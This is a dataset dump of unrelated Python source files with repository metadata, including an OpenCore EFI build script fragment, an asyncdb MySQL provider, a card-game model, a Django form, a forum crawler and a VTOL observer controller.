self.config["Misc"]["BlessOverride"] += ["\\EFI\\Microsoft\\Boot\\bootmgfw.efi"]
def generate_base(self):
# Generate OpenCore base folder and config
if not Path(self.constants.build_path).exists():
logging.info("Creating build folder")
Path(self.constants.build_path).mkdir()
else:
logging.info("Build folder already present, skipping")
if Path(self.constants.opencore_zip_copied).exists():
logging.info("Deleting old copy of OpenCore zip")
Path(self.constants.opencore_zip_copied).unlink()
if Path(self.constants.opencore_release_folder).exists():
logging.info("Deleting old copy of OpenCore folder")
shutil.rmtree(self.constants.opencore_release_folder, onerror=rmtree_handler, ignore_errors=True)
logging.info("")
logging.info(f"- Adding OpenCore v{self.constants.opencore_version} {self.constants.opencore_build}")
shutil.copy(self.constants.opencore_zip_source, self.constants.build_path)
zipfile.ZipFile(self.constants.opencore_zip_copied).extractall(self.constants.build_path)
# Setup config.plist for editing
logging.info("- Adding config.plist for OpenCore")
shutil.copy(self.constants.plist_template, self.constants.oc_folder)
self.config = plistlib.load(Path(self.constants.plist_path).open("rb"))
def set_revision(self):
# Set revision in config
self.config["#Revision"]["Build-Version"] = f"{self.constants.patcher_version} - {date.today()}"
if not self.constants.custom_model:
self.config["#Revision"]["Build-Type"] = "OpenCore Built on Target Machine"
computer_copy = copy.copy(self.constants.computer)
computer_copy.ioregistry = None
self.config["#Revision"]["Hardware-Probe"] = pickle.dumps(computer_copy)
else:
self.config["#Revision"]["Build-Type"] = "OpenCore Built for External Machine"
self.config["#Revision"]["OpenCore-Version"] = f"{self.constants.opencore_version} - {self.constants.opencore_build} - {self.constants.opencore_commit}"
self.config["#Revision"]["Original-Model"] = self.model
self.config["NVRAM"]["Add"]["4D1FDA02-38C7-4A6A-9CC6-4BCCA8B30102"]["OCLP-Version"] = f"{self.constants.patcher_version}"
self.config["NVRAM"]["Add"]["4D1FDA02-38C7-4A6A-9CC6-4BCCA8B30102"]["OCLP-Model"] = self.model
def save_config(self):
plistlib.dump(self.config, Path(self.constants.plist_path).open("wb"), sort_keys=True)
def build_opencore(self):
# Generate OpenCore Configuration
self.build_efi()
if self.constants.allow_oc_everywhere is False or self.constants.allow_native_spoofs is True or (self.constants.custom_serial_number != "" and self.constants.custom_board_serial_number != ""):
smbios.build_smbios(self.model, self.constants, self.config).set_smbios()
support.build_support(self.model, self.constants, self.config).cleanup()
self.save_config()
# Post-build handling
support.build_support(self.model, self.constants, self.config).sign_files()
support.build_support(self.model, self.constants, self.config).validate_pathing()
logging.info("")
logging.info(f"Your OpenCore EFI for {self.model} has been built at:")
logging.info(f" {self.constants.opencore_release_folder}")
logging.info("")
if self.constants.gui_mode is False:
input("Press [Enter] to continue\n")
| UTF-8 | Python | false | false | 5,856 | py | 16 | build.py | 12 | 0.677083 | 0.669399 | 0 | 125 | 45.848 | 200 |
webclinic017/asyncdb | 13,443,247,637,179 | 6afb4dcff5918cb756481051c96d8b99d3a3cece | f50598c605d8299c8093a8c4eba6006c7616912d | /asyncdb/providers/mysql.py | c008acfa4cf5ddbc4e2c473f359e1909de590dd0 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
]
| permissive | https://github.com/webclinic017/asyncdb | 5e87bd8bce6780fdcfa6ef9dfc9129b299a49425 | 2fe94c719c88397d42b38cd8e2954be8eec3eee9 | refs/heads/master | 2023-08-31T09:17:32.841163 | 2021-10-20T17:34:38 | 2021-10-20T17:34:38 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
import asyncio
import json
import time
from datetime import datetime
import aiomysql
from asyncdb.exceptions import (
ConnectionTimeout,
DataError,
EmptyStatement,
NoDataFound,
ProviderError,
StatementError,
TooManyConnections,
)
from asyncdb.providers import (
BasePool,
BaseProvider,
registerProvider,
)
from asyncdb.utils import (
EnumEncoder,
SafeDict,
)
class mysqlPool(BasePool):
_max_queries = 300
# _dsn = 'mysql://{user}:{password}@{host}:{port}/{database}'
loop = asyncio.get_event_loop()
def __init__(self, loop=None, params={}):
self._logger.debug("Ready")
super(mysqlPool, self).__init__(loop=loop, params=params)
def get_event_loop(self):
return self._loop
"""
__init async db initialization
"""
# Create a database connection pool
async def connect(self):
self._logger.debug("aioMysql: Connecting to {}".format(self._params))
self._logger.debug("Start connection")
try:
# TODO: pass a setup class for set_builtin_type_codec and a setup for add listener
self._pool = await aiomysql.create_pool(
host=self._params["host"],
user=self._params["user"],
password=self._params["password"],
db=self._params["database"],
loop=self._loop,
)
except TimeoutError as err:
raise ConnectionTimeout(
"Unable to connect to database: {}".format(str(err))
)
except ConnectionRefusedError as err:
raise ProviderError(
"Unable to connect to database, connection Refused: {}".format(str(err))
)
except Exception as err:
raise ProviderError("Unknown Error: {}".format(str(err)))
return False
# is connected
if self._pool:
self._connected = True
self._initialized_on = time.time()
"""
Take a connection from the pool.
"""
async def acquire(self):
self._logger.debug("Acquire")
db = None
self._connection = None
# Take a connection from the pool.
try:
self._connection = await self._pool.acquire()
except Exception as err:
raise ProviderError("Close Error: {}".format(str(err)))
if self._connection:
db = mysql(pool=self)
db.set_connection(self._connection)
return db
"""
Release a connection from the pool
"""
async def release(self, connection=None, timeout=10):
self._logger.debug("Release")
if not connection:
conn = self._connection
else:
conn = connection
try:
await self._pool.release(conn)
# print('r', r)
# release = asyncio.create_task(r)
# await self._pool.release(connection, timeout = timeout)
# release = asyncio.ensure_future(release, loop=self._loop)
# await asyncio.wait_for(release, timeout=timeout, loop=self._loop)
# await release
except Exception as err:
raise ProviderError("Release Error: {}".format(str(err)))
"""
close
Close Pool Connection
"""
async def wait_close(self, gracefully=True):
if self._pool:
self._logger.debug("aioMysql: Closing Pool")
# try to closing main connection
try:
if self._connection:
await self._pool.release(self._connection, timeout=2)
except Exception as err:
raise ProviderError("Release Error: {}".format(str(err)))
# at now, try to closing pool
try:
await self._pool.close()
# await self._pool.terminate()
except Exception as err:
print("Pool Error: {}".format(str(err)))
await self._pool.terminate()
raise ProviderError("Pool Error: {}".format(str(err)))
finally:
self._pool = None
"""
Close Pool
"""
async def close(self):
# try:
# if self._connection:
# print('self._pool', self._pool)
# await self._pool.release(self._connection)
# except Exception as err:
# raise ProviderError("Release Error: {}".format(str(err)))
try:
await self._pool.close()
except Exception as err:
print("Pool Closing Error: {}".format(str(err)))
self._pool.terminate()
def terminate(self, gracefully=True):
self._loop.run_until_complete(asyncio.wait_for(self.close(), timeout=5))
"""
Execute a connection into the Pool
"""
async def execute(self, sentence, *args):
if self._pool:
try:
result = await self._pool.execute(sentence, *args)
return result
except Exception as err:
raise ProviderError("Execute Error: {}".format(str(err)))
class mysql(BaseProvider):
_provider = "mysql"
_syntax = "sql"
_test_query = "SELECT 1"
_dsn = "mysql://{user}:{password}@{host}:{port}/{database}"
_loop = None
_pool = None
_connection = None
_connected = False
_prepared = None
_parameters = ()
_cursor = None
_transaction = None
_initialized_on = None
_query_raw = "SELECT {fields} FROM {table} {where_cond}"
def __init__(self, loop=None, pool=None, params={}):
super(mysql, self).__init__(loop=loop, params=params)
asyncio.set_event_loop(self._loop)
async def close(self):
"""
Closing a Connection
"""
try:
if self._connection:
if not self._connection.closed:
self._logger.debug("Closing Connection")
try:
if self._pool:
self._pool.close()
else:
self._connection.close()
except Exception as err:
self._pool.terminate()
self._connection = None
raise ProviderError(
"Connection Error, Terminated: {}".format(str(err))
)
except Exception as err:
raise ProviderError("Close Error: {}".format(str(err)))
finally:
self._connection = None
self._connected = False
def terminate(self):
self._loop.run_until_complete(self.close())
async def connection(self):
"""
Get a connection
"""
self._connection = None
self._connected = False
self._cursor = None
try:
if not self._pool:
self._pool = await aiomysql.create_pool(
host=self._params["host"],
user=self._params["user"],
password=self._params["password"],
db=self._params["database"],
loop=self._loop,
)
self._connection = await self._pool.acquire()
self._cursor = await self._connection.cursor()
if self._connection:
self._connected = True
self._initialized_on = time.time()
except Exception as err:
self._connection = None
self._cursor = None
raise ProviderError("connection Error, Terminated: {}".format(str(err)))
finally:
return self._connection
"""
Release a Connection
"""
async def release(self):
try:
if not await self._connection.closed:
if self._pool:
release = asyncio.create_task(
self._pool.release(self._connection, timeout=10)
)
asyncio.ensure_future(release, loop=self._loop)
return await release
else:
await self._connection.close(timeout=5)
except Exception as err:
raise ProviderError("Release Interface Error: {}".format(str(err)))
return False
finally:
self._connected = False
self._connection = None
def prepared_statement(self):
return self._prepared
@property
def connected(self):
if self._pool:
return not self._pool._closed
elif self._connection:
return not self._connection.closed
"""
Preparing a sentence
"""
async def prepare(self, sentence=""):
error = None
if not sentence:
raise EmptyStatement("Sentence is an empty string")
try:
if not self._connection:
await self.connection()
try:
stmt = await asyncio.shield(self._connection.prepare(sentence))
try:
# print(stmt.get_attributes())
self._columns = [a.name for a in stmt.get_attributes()]
self._prepared = stmt
self._parameters = stmt.get_parameters()
except TypeError:
self._columns = []
except RuntimeError as err:
error = "Prepare Runtime Error: {}".format(str(err))
raise StatementError(error)
except Exception as err:
error = "Unknown Error: {}".format(str(err))
raise ProviderError(error)
finally:
return [self._prepared, error]
async def query(self, sentence="", size=100000000000):
# self._logger.debug("Start Query function")
error = None
if not sentence:
raise EmptyStatement("Sentence is an empty string")
if not self._connection:
await self.connection()
try:
startTime = datetime.now()
await self._cursor.execute(sentence)
self._result = await self.fetchmany(size)
if not self._result:
raise NoDataFound("Mysql: No Data was Found")
return [None, "Mysql: No Data was Found"]
except RuntimeError as err:
error = "Runtime Error: {}".format(str(err))
raise ProviderError(error)
except Exception as err:
error = "Error on Query: {}".format(str(err))
raise Exception(error)
finally:
# self._generated = datetime.now() - startTime
# await self.close()
return [self._result, error]
async def queryrow(self, sentence=""):
error = None
if not sentence:
raise EmptyStatement("Sentence is an empty string")
if not self._connection:
await self.connection()
try:
# stmt = await self._connection.prepare(sentence)
# self._columns = [a.name for a in stmt.get_attributes()]
await self._cursor.execute(sentence)
self._result = await self.fetchone()
except RuntimeError as err:
error = "Runtime on Query Row Error: {}".format(str(err))
raise ProviderError(error)
except Exception as err:
error = "Error on Query Row: {}".format(str(err))
raise Exception(error)
# finally:
# await self.close()
return [self._result, error]
async def execute(self, sentence=""):
"""Execute a transaction
get a SQL sentence and execute
returns: results of the execution
"""
error = None
result = None
if not sentence:
raise EmptyStatement("Sentence is an empty string")
if not self._connection:
await self.connection()
try:
result = await self._cursor.execute(sentence)
return [result, None]
return [None, error]
except Exception as err:
error = "Error on Execute: {}".format(str(err))
raise [None, error]
finally:
return [result, error]
async def executemany(self, sentence="", args=[]):
error = None
if not sentence:
raise EmptyStatement("Sentence is an empty string")
if not self._connection:
await self.connection()
try:
await self.begin()
await self._cursor.executemany(sentence, args)
await self.commit()
return False
except Exception as err:
await self.rollback()
error = "Error on Execute: {}".format(str(err))
raise Exception(error)
finally:
return error
"""
Transaction Context
"""
async def begin(self):
if not self._connection:
await self.connection()
await self._connection.begin()
return self
async def commit(self):
if not self._connection:
await self.connection()
await self._connection.commit()
return self
async def rollback(self):
if not self._connection:
await self.connection()
await self._connection.rollback()
return self
"""
Cursor Context
"""
async def cursor(self, sentence=""):
self._logger.debug("Cursor")
if not self._connection:
await self.connection()
return self._cursor
async def forward(self, number):
try:
return await self._cursor.scroll(number)
except Exception as err:
error = "Error forward Cursor: {}".format(str(err))
raise Exception(error)
async def fetchall(self):
try:
return await self._cursor.fetchall()
except Exception as err:
error = "Error FetchAll Cursor: {}".format(str(err))
raise Exception(error)
async def fetchmany(self, size=None):
try:
return await self._cursor.fetchmany(size)
except Exception as err:
error = "Error FetchMany Cursor: {}".format(str(err))
raise Exception(error)
async def fetchone(self):
try:
return await self._cursor.fetchone()
except Exception as err:
error = "Error FetchOne Cursor: {}".format(str(err))
raise Exception(error)
"""
Cursor Iterator Context
"""
def __aiter__(self):
return self
async def __anext__(self):
data = await self._cursor.fetchrow()
if data is not None:
return data
else:
raise StopAsyncIteration
"""
COPY Functions
type: [ text, csv, binary ]
"""
async def copy_from_table(
self, table="", schema="public", output=None, type="csv", columns=None
):
"""table_copy
get a copy of table data into a file, file-like object or a coroutine passed on "output"
returns: num of rows copied.
example: COPY 1470
"""
if not self._connection:
await self.connection()
try:
result = await self._connection.copy_from_table(
table_name=table,
schema_name=schema,
columns=columns,
format=type,
output=output,
)
print(result)
return result
except Exception as err:
error = "Error on Table Copy: {}".format(str(err))
raise Exception(error)
async def copy_to_table(
self, table="", schema="public", source=None, type="csv", columns=None
):
"""copy_to_table
get data from a file, file-like object or a coroutine passed on "source" and copy into table
returns: num of rows copied.
example: COPY 1470
"""
if not self._connection:
await self.connection()
try:
result = await self._connection.copy_to_table(
table_name=table,
schema_name=schema,
columns=columns,
format=type,
source=source,
)
print(result)
return result
except Exception as err:
error = "Error on Table Copy: {}".format(str(err))
raise Exception(error)
async def copy_into_table(
self, table="", schema="public", source=None, columns=None
):
"""copy_into_table
get data from records (any iterable object) and save into table
returns: num of rows copied.
example: COPY 1470
"""
if not self._connection:
await self.connection()
try:
result = await self._connection.copy_records_to_table(
table_name=table, schema_name=schema, columns=columns, records=source
)
print(result)
return result
except Exception as err:
error = "Error on Table Copy: {}".format(str(err))
raise Exception(error)
"""
Meta-Operations
"""
def table(self, table):
try:
return self._query_raw.format_map(SafeDict(table=table))
except Exception as e:
print(e)
return False
def fields(self, sentence, fields=None):
_sql = False
if not fields:
_sql = sentence.format_map(SafeDict(fields="*"))
elif type(fields) == str:
_sql = sentence.format_map(SafeDict(fields=fields))
elif type(fields) == list:
_sql = sentence.format_map(SafeDict(fields=",".join(fields)))
return _sql
"""
where
add WHERE conditions to SQL
"""
def where(self, sentence, where):
sql = ""
if sentence:
where_string = ""
if not where:
sql = sentence.format_map(SafeDict(where_cond=""))
elif type(where) == dict:
where_cond = []
for key, value in where.items():
# print("KEY {}, VAL: {}".format(key, value))
if type(value) == str or type(value) == int:
if value == "null" or value == "NULL":
where_string.append("%s IS NULL" % (key))
elif value == "!null" or value == "!NULL":
where_string.append("%s IS NOT NULL" % (key))
elif key.endswith("!"):
where_cond.append("%s != %s" % (key[:-1], value))
else:
if (
type(value) == str
and value.startswith("'")
and value.endswith("'")
):
where_cond.append("%s = %s" % (key, "{}".format(value)))
elif type(value) == int:
where_cond.append("%s = %s" % (key, "{}".format(value)))
else:
where_cond.append(
"%s = %s" % (key, "'{}'".format(value))
)
elif type(value) == bool:
val = str(value)
where_cond.append("%s = %s" % (key, val))
else:
val = ",".join(map(str, value))
if type(val) == str and "'" not in val:
where_cond.append("%s IN (%s)" % (key, "'{}'".format(val)))
else:
where_cond.append("%s IN (%s)" % (key, val))
# if 'WHERE ' in sentence:
# where_string = ' AND %s' % (' AND '.join(where_cond))
# else:
where_string = " WHERE %s" % (" AND ".join(where_cond))
print("WHERE cond is %s" % where_string)
sql = sentence.format_map(SafeDict(where_cond=where_string))
elif type(where) == str:
where_string = where
if not where.startswith("WHERE"):
where_string = " WHERE %s" % where
sql = sentence.format_map(SafeDict(where_cond=where_string))
else:
sql = sentence.format_map(SafeDict(where_cond=""))
del where
del where_string
return sql
else:
return False
def limit(self, sentence, limit=1):
"""
LIMIT
add limiting to SQL
"""
if sentence:
return "{q} LIMIT {limit}".format(q=sentence, limit=limit)
return self
def orderby(self, sentence, ordering=[]):
"""
LIMIT
add limiting to SQL
"""
if sentence:
if type(ordering) == str:
return "{q} ORDER BY {ordering}".format(q=sentence, ordering=ordering)
elif type(ordering) == list:
return "{q} ORDER BY {ordering}".format(
q=sentence, ordering=", ".join(ordering)
)
return self
def get_query(self, sentence):
"""
get_query
Get formmated query
"""
sql = sentence
try:
# remove fields and where_cond
sql = sentence.format_map(SafeDict(fields="*", where_cond=""))
if not self.connected:
self._loop.run_until_complete(self.connection())
prepared, error = self._loop.run_until_complete(self.prepare(sql))
if not error:
self._columns = self.get_columns()
else:
print("Error in Get Query", error)
return False
except (ProviderError, StatementError) as err:
print("ProviderError or StatementError Exception in Get Query", e)
return False
except Exception as e:
print("Exception in Get Query", e)
return False
return sql
def column_info(self, table):
"""
column_info
get column information about a table
"""
discover = "SELECT attname AS column_name, atttypid::regtype AS data_type FROM pg_attribute WHERE attrelid = '{}'::regclass AND attnum > 0 AND NOT attisdropped ORDER BY attnum".format(
table
)
try:
result, error = self._loop.run_until_complete(self.query(discover))
if result:
return result
except (NoDataFound, ProviderError):
print(err)
return False
except Exception as err:
print(err)
return False
def insert(self, table, data, **kwargs):
"""
insert
insert the result onto a table
"""
sql = "INSERT INTO {table} ({fields}) VALUES ({values})"
sql = sql.format_map(SafeDict(table=table))
# set columns
sql = sql.format_map(SafeDict(fields=",".join(data.keys())))
values = ",".join(str(v) for v in data.values())
sql = sql.format_map(SafeDict(values=values))
try:
result = self._loop.run_until_complete(self._connection.execute(sql))
if not result:
print(result)
return False
else:
return result
except Exception as err:
# print(sql)
print(err)
return False
"""
Registering this Provider
"""
registerProvider(mysql)
| UTF-8 | Python | false | false | 23,819 | py | 77 | mysql.py | 61 | 0.513288 | 0.51165 | 0 | 722 | 31.990305 | 193 |
skrla/OOP_JAVA_PHP_PYTHON_SWIFT | 4,346,506,951,515 | 59a9f2bcfb761f6125af7c045b6fd8876cb2998c | 7dd0b989cb4915f9a04361da49f0c10775209c86 | /Python/model/Partija.py | bee25d69f4a22a311c7baf1f38921d379ce532bf | []
| no_license | https://github.com/skrla/OOP_JAVA_PHP_PYTHON_SWIFT | aa55771ccbb1406bcd2ac6b6699145403835cc75 | ecb79d79cf8c6e78f8e330f73a4d7a6f438a925a | refs/heads/master | 2023-03-29T05:57:05.824323 | 2021-03-28T12:20:03 | 2021-03-28T12:20:03 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from model.Entitet import Entitet
from model.Igrac import Igrac
from model.Lokacija import Lokacija
from model.Rezultat import Rezultat
class Partija(Entitet):
def __init__(self, sifra=None):
super().__init__(sifra)
self._do_koliko_se_igra = 501
self._lokacija = Lokacija()
self._unosi = Igrac()
self._mjesanja = []
self._igraci = []
def get_rezultat(self) -> Rezultat:
rezultat = Rezultat()
rezultat.prvi = sum(mjesanje.get_rezultat().prvi for mjesanje in self.mjesanja)
rezultat.drugi = sum(mjesanje.get_rezultat().drugi for mjesanje in self.mjesanja)
return rezultat
@property
def is_igra_gotova(self) -> bool:
rezultat = self.get_rezultat()
if rezultat.is_pocetak():
return False
if rezultat.treci == 0:
return False if rezultat.prvi == rezultat.drugi else rezultat.prvi > self.do_koliko_se_igra or \
rezultat.drugi > self.do_koliko_se_igra
else:
return rezultat.prvi > self.do_koliko_se_igra or rezultat.drugi > self.do_koliko_se_igra or \
rezultat.treci > self.do_koliko_se_igra
return False
@property
def do_koliko_se_igra(self):
return self._do_koliko_se_igra
@do_koliko_se_igra.setter
def do_koliko_se_igra(self, do_koliko_se_igra):
self._do_koliko_se_igra = do_koliko_se_igra
@property
def lokacija(self):
return self._lokacija
@lokacija.setter
def lokacija(self, lokacija):
self._lokacija = lokacija
@property
def unosi(self):
return self._unosi
@unosi.setter
def unosi(self, unosi):
self._unosi = unosi
@property
def mjesanja(self):
return self._mjesanja
@mjesanja.setter
def mjesanja(self, mjesanja):
self._mjesanja = mjesanja
@property
def igraci(self):
return self._igraci
@igraci.setter
def igraci(self, igraci):
self._igraci = igraci
| UTF-8 | Python | false | false | 2,082 | py | 88 | Partija.py | 67 | 0.599904 | 0.597983 | 0 | 74 | 27.135135 | 108 |
FujitaHirotaka/djangoruler3 | 17,471,926,973,275 | 0cf324e4784b2b933bec45adc7129823a054d5df | c1c7214e1f9230f19d74bb9776dac40d820da892 | /examples/css辞書/dropshadow/box-shadow/project/app/forms.py | 1bc8d7ad974bab511d23f93c0df35a2810c133de | []
| no_license | https://github.com/FujitaHirotaka/djangoruler3 | cb326c80d9413ebdeaa64802c5e5f5daadb00904 | 9a743fbc12a0efa73dbc90f93baddf7e8a4eb4f8 | refs/heads/master | 2020-04-01T13:32:28.078110 | 2018-12-13T00:39:56 | 2018-12-13T00:39:56 | 153,256,642 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django import forms
from .models import *
from django.urls import reverse
from django.urls import reverse_lazy
from pathlib import Path
bathpath=Path.cwd()/"app"/"static"/"app"/"images"
class CssForm(forms.Form):
value1=forms.IntegerField(label="第一パラメーター(水平方向の影のオフセット距離 px)", help_text="正負の値可")
value2=forms.IntegerField(label="第二パラメーター(垂直方向の影のオフセット距離 px)", help_text="正負の値可")
value3=forms.IntegerField(label="第三パラメーター(ぼかし距離)px", help_text="正の値のみ可")
value4=forms.IntegerField(label="第四パラメーター(広がり距離)px", help_text="正の値のみ可")
inset=forms.BooleanField(label="第五パラメーター(inset)", required=False) | UTF-8 | Python | false | false | 840 | py | 300 | forms.py | 136 | 0.753226 | 0.746774 | 0 | 14 | 43.071429 | 85 |
ivanAbregu/ci | 15,710,990,396,127 | 487d2767a1308b1f1cbd958c84ab804f6b6a03a9 | 3931c14aca58e2149a6440245e363807732a17fd | /test_sum.py | c4dbe8a85463e9df1aabb1a9a1cfaa49c34d5307 | []
| no_license | https://github.com/ivanAbregu/ci | 830ee297a5b469cdd2e05583ac3fe85ea34ee179 | 5d473b17a7a15223acbda50bf993254b40977aff | refs/heads/master | 2020-12-31T10:10:04.149824 | 2020-03-09T02:10:50 | 2020-03-09T02:10:50 | 238,993,606 | 0 | 0 | null | false | 2020-06-04T18:07:20 | 2020-02-07T18:08:56 | 2020-03-09T02:10:53 | 2020-03-09T02:13:35 | 18 | 0 | 0 | 1 | Python | false | false | import unittest
from sum import custom_sum
class MyTestCase(unittest.TestCase):
def test_custom_sum(self):
self.assertEqual(custom_sum(1, 1), 2)
def test_sum_big(self):
self.assertEqual(custom_sum(5000, 5000), 10000)
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 291 | py | 3 | test_sum.py | 2 | 0.652921 | 0.597938 | 0 | 12 | 23.25 | 55 |
mtianyan/LeetcodePython | 18,674,517,806,581 | c0487f6a371675ec41070859ac5475b0471ef670 | 7f57c1bc457f693d1e2b482bd92180b5f619d3bb | /easy/7-0706/160-intersection-of-two-linked-lists.py | 4322be9e165f9c752b96f7f5c1db0975101f5fbf | []
| no_license | https://github.com/mtianyan/LeetcodePython | 17694eed256886a075208264904ac1533df71d03 | 6880de6f92d8b6bf9223656f356831fb2b475202 | refs/heads/master | 2023-07-11T19:46:54.388781 | 2023-07-06T15:59:34 | 2023-07-06T15:59:34 | 331,367,286 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
A, B = headA, headB
while A != B:
A = A.next if A else headB
B = B.next if B else headA
return A
class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
s = set()
p, q = headA, headB
while p:
s.add(p)
p = p.next
while q:
if q in s:
return q
q = q.next
return None
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> Optional[ListNode]:
hash_set = set()
i, j = headA, headB
while i:
hash_set.add(i)
i = i.next
while j:
if j in hash_set:
return j
hash_set.add(j)
j = j.next
return None
| UTF-8 | Python | false | false | 1,064 | py | 138 | 160-intersection-of-two-linked-lists.py | 137 | 0.496241 | 0.496241 | 0 | 42 | 24.333333 | 90 |
specialkgb/StudyCrawl | 14,242,111,602,883 | 33da6bd239094245c160d5dca801e3f4008d257d | 0cb2a54f19435afb72181500979f53c6edc15ca2 | /apart/boardpage.py | 7aa35503b71e18f812ce494f0cc2dd45d6a3ce41 | []
| no_license | https://github.com/specialkgb/StudyCrawl | 3c1ba953fdc234a7bbf1a5de6c1bef34c270d410 | 8385cafde8883d9e49eef162a39fb31e1e75f88c | refs/heads/master | 2022-11-10T15:30:49.187134 | 2020-06-18T07:29:39 | 2020-06-18T07:29:39 | 273,171,856 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import requests
from bs4 import BeautifulSoup
cnt = 0
for page in range(1, 6):
list_url = 'http://news.sarangbang.com/bbs.html?tab=free&p={}'.format(page)
resp = requests.get(list_url)
if resp.status_code != 200:
print('WARNING: 잘못된 URL 접근')
soup = BeautifulSoup(resp.text, 'html.parser')
board_list = soup.select('tbody#bbsResult a#gLsbj_578015')
for i in range(0, 20):
# print(i, href)
# 1건의 게시글의 제목, 내용, 작성자, 작성일자 수집하는 코드
url = 'http://news.sarangbang.com{}'.format(board_list[i]['href'])
print('>>>>>>>>>>', url)
resp = requests.get(url)
# if resp.status_code != 200:
# print('WARNING: 잘못된 URL 접근')
soup = BeautifulSoup(resp.text, 'html.parser')
title = soup.select('h3.tit_view')[0].text.strip()
cnt += 1
print('TITLE ▶▶', title)
writer = soup.select('a.name_more')[0].text.strip()
print('WRITER ▶▶', writer)
date = soup.select('span.tit_cat')[1].text.strip()[:10]
print('DATE ▶▶', date)
contents = soup.select('div.bbs_view p') + soup.select('div.bbs_view div') #태그명 p의 데이터가 없을 경우 div 태그의 내용을 붙여넣기
content = ''
for i in contents:
content += i.text.strip()
print(content)
print('사랑방 부동산에서 {}건의 게시글을 수집하였습니다.'.format(cnt)) | UTF-8 | Python | false | false | 1,501 | py | 5 | boardpage.py | 5 | 0.570681 | 0.550486 | 0 | 43 | 30.116279 | 118 |
pratik-ingle/Planar-VTOL | 14,259,291,427,562 | d986ed67dd4ba10df9921c088f86c0fa2e1cb724 | e18409e0455d020e536d87e68fd8e115aedb7a8f | /Observers:Disturbance/hw13/vtolController.py | 586314cef67f8f96822bbe69b495b5a0c82a3b4b | []
| no_license | https://github.com/pratik-ingle/Planar-VTOL | 28c8d8ca13200c37cc5880b81a4acc0435afd55f | 82a8c8a608d4a438fd847d7c42d11fcf81319475 | refs/heads/main | 2023-04-25T00:27:13.900226 | 2021-05-19T17:35:47 | 2021-05-19T17:35:47 | 321,948,258 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import numpy as np
import vtolParamhw13 as P
import vtolParam as P1
class PDController:
def __init__(self):
self.x1_hat = np.array([
[0.0], # initial estimate for z_hat
[0.0], # initial estimate for theta_hat
[0.0], # initial estimate for z_hat_dot
[0.0]]) # initial estimate for theta_hat_dot
self.x2_hat =np.array([
[0.0], # initial estimate for h_hat
[0.0]]) # initial estimate for h_hat_dot
self.F_lat = 0.0 # Computed latral Force, delayed by one sample
self.F_lon = 0.0 # Computed longitudinal Force, delayed by one sample
self.integrator = 0.0 # integrator
self.error_d1 = 0.0 # error signal delayed by 1 sample
self.K_z = P.K_z # state feedback gain
self.K_h = P.K_h # state feedback gain
self.ki_z = P.ki_z # integrator gain
self.ki_h = P.ki_h # integrator gain
self.L_z = P.L_z # observer gain
self.L_h = P.L_h # observer gain
self.A_z = P.A_z # system model lat
self.B_z = P.B_z
self.C_z = P.C_z
self.A_h = P.A_h # system model long
self.B_h = P.B_h
self.C_h = P.C_h
self.limit = P.F_max # Maximum force
self.Ts = P.Ts # sample rate of controller
#------------------------------------------------------------------------------
# def update_lat(self, zref,state):
# # Compute the state feedback controller
# z = state
# error = zref - z
# self.integrateError(error)
# F_unsat = self.K_z @ z + self.ki_z *self.integrator
#
# tau = self.saturate(F_unsat[0])
# return tau.item(0)
def update_lat(self, z_r, y):
# update the observer and extract z_hat
x1_hat = self.update_observer_z(y)
z_hat = x1_hat.item(0)
# integrate error
error = z_r - z_hat
self.integrate_error(error)
# Compute the state feedback controller
F_unsat = -self.K_z*x1_hat - self.ki_z*self.integrator
F_sat = self.saturate(F_unsat.item(0))
self.F_lat= F_sat
return F_sat, x1_hat
def update_observer_z(self, y_m):
# update the observer using RK4 integration
F1 = self.observer_f_lat(self.x1_hat, y_m)
F2 = self.observer_f_lat(self.x1_hat + self.Ts / 2 * F1, y_m)
F3 = self.observer_f_lat(self.x1_hat + self.Ts / 2 * F2, y_m)
F4 = self.observer_f_lat(self.x1_hat + self.Ts * F3, y_m)
self.x1_hat += self.Ts / 6 * (F1 + 2 * F2 + 2 * F3 + F4)
return self.x1_hat
def observer_f_lat(self, x1_hat, y_m):
# xhatdot = A*xhat + B*u + L(y-C*xhat)
x1hat_dot = self.A_z @ x1_hat \
+ self.B_z * self.F_lat \
+ self.L_z @ (y_m-self.C_z @ x1_hat)
return x1hat_dot
#------------------------------------------------------------------------------
# def update_lon(self,ref,state):
# x = state
#
# #F = (P.mc+P.ml+P.mr)*P.g + self.kp * (ref - x) - self.kd * xdot
#
# x = state
# # integrate error
# error = ref - x
# self.integrateError(error)
# # Compute the state feedback controller
# F_unsat = (P1.mc+P1.ml+P1.mr)*P1.g -self.K_h @ x + self.ki_h*self.integrator
# F = self.saturate(F_unsat[0])
# return F.item(0)
def update_lon(self, h_r, y):
# update the observer and extract z_hat
x2_hat = self.update_observer_h(y)
h_hat = x2_hat.item(0)
# integrate error
error = h_r - h_hat
self.integrate_error(error)
# Compute the state feedback controller
F_unsat = (P1.mc+P1.ml+P1.mr)*P1.g -self.K_h*x2_hat - self.ki_h*self.integrator
F_sat = self.saturate(F_unsat.item(0))
self.F_lon= F_sat
return F_sat, x2_hat
def update_observer_h(self, y_m):
# update the observer using RK4 integration
F1 = self.observer_f_lon(self.x2_hat, y_m)
F2 = self.observer_f_lon(self.x2_hat + self.Ts / 2 * F1, y_m)
F3 = self.observer_f_lon(self.x2_hat + self.Ts / 2 * F2, y_m)
F4 = self.observer_f_lon(self.x2_hat + self.Ts * F3, y_m)
self.x2_hat += self.Ts / 6 * (F1 + 2 * F2 + 2 * F3 + F4)
return self.x2_hat
def observer_f_lon(self, x2_hat, y_m):
# xhatdot = A*xhat + B*u + L(y-C*xhat)
print(self.x2_hat,y_m)
x2hat_dot = self.A_h @ x2_hat \
+ self.B_h * self.F_lon \
